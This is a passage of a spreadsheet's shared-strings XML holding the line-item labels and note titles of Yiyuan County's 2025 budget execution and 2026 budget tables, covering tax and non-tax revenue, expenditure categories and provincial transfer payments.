        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>2</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县政府性基金预算收支执行情况的说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>3</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县国有资本经营预算收支执行情况的说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>4</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年县对下税收返还及转移支付执行情况的说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>5</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年县对下政府性基金预算转移支付预算表的说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>6</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年县对下国有资本经营预算转移支付预算表的说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>7</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年县对下税收返还及转移支付预算的说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>8</t>
    </r>
  </si>
  <si>
    <t>关于地方政府债务2025年执行及2026年预算有关情况的说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>9</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年三公经费情况及增减变化说明</t>
  </si>
  <si>
    <t>第一部分 
2025年全县预算执行情况</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>1</t>
    </r>
  </si>
  <si>
    <t>单位：万元</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>项</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">       </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>目</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2024年
决算数</t>
  </si>
  <si>
    <t xml:space="preserve"> 2025年预算
调整数</t>
  </si>
  <si>
    <t xml:space="preserve"> 2025年执行数</t>
  </si>
  <si>
    <t>金额</t>
  </si>
  <si>
    <t>占调整
预算%</t>
  </si>
  <si>
    <t>比上年
增长%</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、税收收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>增值税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>企业所得税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>个人所得税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资源税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市维护建设税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>房产税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>印花税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城镇土地使用税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>土地增值税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车船税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>耕地占用税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>契税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>烟叶税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>环境保护税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他税收收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、非税收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政事业性收费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>罚没收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资本经营收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资源</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资产</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>有偿使用收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>捐赠收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>本年收入合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三、债务收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府新增一般债券转贷收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府再融资一般债券转贷收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>四、转移性收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>返还性收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上级一般性转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上级专项转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>动用预算稳定调节基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>区域间转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>调入资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上年结转及结余收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>收入总计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、一般公共服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、外交支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三、国防支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>四、公共安全支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>五、教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>六、科学技术支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>七、文化旅游体育与传媒支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>八、社会保障和就业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>九、卫生健康支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十、节能环保支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十一、城乡社区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十二、农林水支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十三、交通运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十四、资源勘探工业信息等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十五、商业服务业等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十六、金融支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十七、援助其他地区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十八、自然资源海洋气象等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十九、住房保障支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十、粮油物资储备支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十一、灾害防治及应急管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十二、预备费</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十三、债务付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十四、债务发行费用支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十五、其他支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>本年支出合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府一般债务还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府其他一般债券还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府再融资一般债券还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>转移性支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一般性转移支付</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上解支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>安排预算稳定调节基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>调出资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年终结余</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>支出总计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>3</t>
    </r>
  </si>
  <si>
    <t>2025年山东省对沂源县一般性转移支付及税收返还情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">项   </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">	</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>目</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">	</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   额</t>
    </r>
  </si>
  <si>
    <t>一、一般性转移支付</t>
  </si>
  <si>
    <t xml:space="preserve">  其中：均衡性转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 县级基本财力保障机制奖补资金收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 结算补助收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 企业事业单位划转补助收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 产粮（油）大县奖励资金收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 重点生态功能区转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 固定数额补助收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 革命老区转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 巩固脱贫攻坚成果衔接乡村振兴转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 公共安全共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 教育共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 科学技术共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 文化旅游体育与传媒共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 社会保障和就业共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 医疗卫生共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 节能环保共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 农林水共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 交通运输共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 住房保障共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 粮油物资储备共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 灾害防治及应急管理共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 其他一般性转移支付收入</t>
  </si>
  <si>
    <t>二、返还性收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 所得税基数返还收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 成品油税费改革税收返还收入</t>
  </si>
  <si>
